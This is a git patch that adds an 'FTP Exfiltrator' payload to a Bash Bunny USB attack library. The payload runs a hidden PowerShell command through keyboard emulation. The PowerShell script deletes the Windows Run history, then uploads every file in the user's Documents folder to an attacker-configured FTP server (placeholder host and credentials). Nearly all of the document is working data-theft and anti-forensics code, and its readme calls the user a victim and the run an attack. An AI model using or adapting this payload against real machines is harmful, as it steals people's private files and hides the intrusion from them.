From 385a54656c4a6cad5ff8feec1f1bcbe101528f72 Mon Sep 17 00:00:00 2001
From: nutt318 <jakenutt@gmail.com>
Date: Fri, 7 Apr 2017 01:51:38 -0500
Subject: [PATCH] Added FTPExfiltration payload (#90)

* First commit of all documents

First commit

* Fixed user document folder

* Removed unneeded line

* Edited URL to forum
---
 payloads/library/ftp_exfiltrator/1.ps1       | 78 ++++++++++++++++++++
 payloads/library/ftp_exfiltrator/payload.txt | 27 +++++++
 payloads/library/ftp_exfiltrator/readme.md   | 26 +++++++
 3 files changed, 131 insertions(+)
 create mode 100644 payloads/library/ftp_exfiltrator/1.ps1
 create mode 100644 payloads/library/ftp_exfiltrator/payload.txt
 create mode 100644 payloads/library/ftp_exfiltrator/readme.md

diff --git a/payloads/library/ftp_exfiltrator/1.ps1 b/payloads/library/ftp_exfiltrator/1.ps1
new file mode 100644
index 00000000..1c0fec26
--- /dev/null
+++ b/payloads/library/ftp_exfiltrator/1.ps1
@@ -0,0 +1,78 @@
+clear
+#Clear Run History
+remove-item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
+
+# Credit to dkittell - https://gist.github.com/dkittell/f029b6c7d1c46ebcffcb
+# I've modified a bit of his code to create a directory with the username, I'm sure there is a better way to do this but not sure how
+
+# FTP Server Variables - edit the xxxxx
+$FTPHost = 'ftp://ftp.xxxxx.com/' + $env:username + '/'
+$FTPUser = 'xxxxx'
+$FTPPass = 'xxxxx'
+ 
+#Directory where to find files to upload
+$UploadFolder = "$env:userprofile\Documents\"
+  
+$webclient = New-Object System.Net.WebClient 
+$webclient.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass)  
+ 
+$SrcEntries = Get-ChildItem $UploadFolder -Recurse
+$Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer}
+$SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer}
+
+#Creates Folder with victims Username
+try {
+$makeDirectory = [System.Net.WebRequest]::Create($FTPHost);
+$makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+$makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
+$makeDirectory.GetResponse(); 
+}
+catch [Net.WebException] {}
+
+# Create FTP Directory/SubDirectory If Needed - Start
+foreach($folder in $Srcfolders)
+{    
+    $SrcFolderPath = $UploadFolder  -replace "\\","\\" -replace "\:","\:"   
+    $DesFolder = $folder.Fullname -replace $SrcFolderPath,$FTPHost
+    $DesFolder = $DesFolder -replace "\\", "/"
+    # Write-Output $DesFolder
+ 
+    try
+        {
+            $makeDirectory = [System.Net.WebRequest]::Create($DesFolder);
+            $makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+            $makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
+            $makeDirectory.GetResponse();
+            #folder created successfully
+        }
+    catch [Net.WebException]
+        {
+            try {
+                #if there was an error returned, check if folder already existed on server
+                $checkDirectory = [System.Net.WebRequest]::Create($DesFolder);
+                $checkDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+                $checkDirectory.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory;
+                $response = $checkDirectory.GetResponse();
+                #folder already exists!
+            }
+            catch [Net.WebException] {
+                #if the folder didn't exist
+            }
+        }
+}
+# Create FTP Directory/SubDirectory If Needed - Stop
+ 
+# Upload Files - Start
+foreach($entry in $SrcFiles)
+{
+    $SrcFullname = $entry.fullname
+    $SrcName = $entry.Name
+    $SrcFilePath = $UploadFolder -replace "\\","\\" -replace "\:","\:"
+    $DesFile = $SrcFullname -replace $SrcFilePath,$FTPHost
+    $DesFile = $DesFile -replace "\\", "/"
+    # Write-Output $DesFile
+ 
+    $uri = New-Object System.Uri($DesFile) 
+    $webclient.UploadFile($uri, $SrcFullname)
+}
+# Upload Files - Stop
\ No newline at end of file
diff --git a/payloads/library/ftp_exfiltrator/payload.txt b/payloads/library/ftp_exfiltrator/payload.txt
new file mode 100644
index 00000000..eff48232
--- /dev/null
+++ b/payloads/library/ftp_exfiltrator/payload.txt
@@ -0,0 +1,27 @@
+#!/bin/bash
+#
+# Title:         FTP Exfiltrator
+# Author:        Nutt
+# Version:       1.0
+# Target:        Windows
+# 
+#Exfiltrates files from the users Documents folder
+#FTP's all files/folders to a specified FTP site named by the victim hostname.
+#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
+
+#Executes 1.ps1
+
+#Purple.........Setup
+#Red............Failed - Need to work on
+#Green..........Finished
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R B
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 1000
+QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
+QUACK ENTER
+LED G
\ No newline at end of file
diff --git a/payloads/library/ftp_exfiltrator/readme.md b/payloads/library/ftp_exfiltrator/readme.md
new file mode 100644
index 00000000..6b2416ed
--- /dev/null
+++ b/payloads/library/ftp_exfiltrator/readme.md
@@ -0,0 +1,26 @@
+# FTP Exfiltrator for Bash Bunny
+
+* Author: Nutt
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Exfiltrates files from the users Documents folder
+FTP's all files/folders to a specified FTP site named by the victim hostname.
+Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
+
+## Configuration
+
+Edit 1.ps1 to specify FTP site, username and password
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Purple			 | Setup								        |
+| Red                | Failed - Not working yet                     |
+| Green              | Attack Complete                              |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40492-payload-ftp-exfiltrator/ "Hak5 Forum Thread")